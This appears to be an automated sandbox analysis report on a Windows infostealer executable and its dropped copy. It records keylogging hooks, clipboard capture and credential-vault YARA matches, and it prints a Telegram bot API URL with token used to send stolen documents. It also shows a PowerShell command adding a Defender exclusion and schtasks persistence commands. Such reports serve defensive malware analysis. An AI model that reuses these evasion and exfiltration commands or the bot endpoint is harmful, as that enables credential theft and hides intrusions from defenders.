Source: z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003201000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.ipify.org
Source: vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.ipify.org/
Source: vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.ipify.org/t
Source: z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram
Source: z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003306000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003388000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000036A3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000329A000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000334D000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000327E000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003178000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org
Source: z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003201000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/
Source: z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003306000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003388000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000036A3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003707000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000329A000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000334D000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000327E000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003178000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument
                      Source: z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003306000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgDAh
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49738 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, n00.cs | .Net Code: _9Pddo
Source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, n00.cs | .Net Code: _9Pddo
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\z1E-catalogSamples.exe
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\vZkoWbol.exe
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: z1E-catalogSamples.exe, NominalArffToBin.cs | Large array initialization: array initializer size 616556
Source: z1E-catalogSamples.exe | Binary or memory string: OriginalFilename vs z1E-catalogSamples.exe
Source: z1E-catalogSamples.exe, 00000000.00000002.2101535049.0000000003141000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs z1E-catalogSamples.exe
Source: z1E-catalogSamples.exe, 00000000.00000002.2101535049.00000000031EB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebb634632-562a-4a42-9009-a1faa07fc1d1.exe4 vs z1E-catalogSamples.exe
Source: z1E-catalogSamples.exe, 00000000.00000000.2055190218.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameVKdc.exe4 vs z1E-catalogSamples.exe
Source: z1E-catalogSamples.exe, 00000000.00000002.2104061408.0000000005C60000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs z1E-catalogSamples.exe
Source: z1E-catalogSamples.exe, 00000000.00000002.2104574579.0000000006530000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs z1E-catalogSamples.exe
Source: z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebb634632-562a-4a42-9009-a1faa07fc1d1.exe4 vs z1E-catalogSamples.exe
Source: z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs z1E-catalogSamples.exe
Source: z1E-catalogSamples.exe, 00000000.00000002.2099951927.000000000125E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs z1E-catalogSamples.exe
Source: z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000043C000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebb634632-562a-4a42-9009-a1faa07fc1d1.exe4 vs z1E-catalogSamples.exe
Source: z1E-catalogSamples.exe, 00000006.00000002.4524235462.0000000000FD9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs z1E-catalogSamples.exe
Source: z1E-catalogSamples.exe | Binary or memory string: OriginalFilenameVKdc.exe4 vs z1E-catalogSamples.exe
Source: z1E-catalogSamples.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: z1E-catalogSamples.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vZkoWbol.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, NpXw3kw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, NpXw3kw.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, fpnV0Qjz.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, qf3KIIPkQkHyoPCAGD.cs | Security API names: _0020.SetAccessControl
Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, qf3KIIPkQkHyoPCAGD.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, qf3KIIPkQkHyoPCAGD.cs | Security API names: _0020.AddAccessRule
Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, WeRTmg58MlbmW9GQYv.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: z1E-catalogSamples.exe, vZkoWbol.exe.0.dr | Binary or memory string: M.slNL
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@18/11@3/2
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | File created: C:\Users\user\AppData\Roaming\vZkoWbol.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3868:120:WilError_03
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Mutant created: \Sessions\1\BaseNamedObjects\OBsYgLyXXGCDPGkEKBj
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2640:120:WilError_03
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | File created: C:\Users\user\AppData\Local\Temp\PO_00UT11
Source: z1E-catalogSamples.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: z1E-catalogSamples.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | File read: C:\Users\user\Desktop\z1E-catalogSamples.exe:Zone.Identifier
Source: unknown | Process created: C:\Users\user\Desktop\z1E-catalogSamples.exe "C:\Users\user\Desktop\z1E-catalogSamples.exe"
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Process created: C:\Users\user\Desktop\z1E-catalogSamples.exe "C:\Users\user\Desktop\z1E-catalogSamples.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\vZkoWbol.exe C:\Users\user\AppData\Roaming\vZkoWbol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Process created: C:\Users\user\AppData\Roaming\vZkoWbol.exe "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Process created: C:\Users\user\AppData\Roaming\vZkoWbol.exe "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess created: C:\Users\user\Desktop\z1E-catalogSamples.exe "C:\Users\user\Desktop\z1E-catalogSamples.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess created: C:\Users\user\AppData\Roaming\vZkoWbol.exe "C:\Users\user\AppData\Roaming\vZkoWbol.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess created: C:\Users\user\AppData\Roaming\vZkoWbol.exe "C:\Users\user\AppData\Roaming\vZkoWbol.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: wbemcomn.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: rasapi32.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: rasman.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Section loaded: rtutils.dll
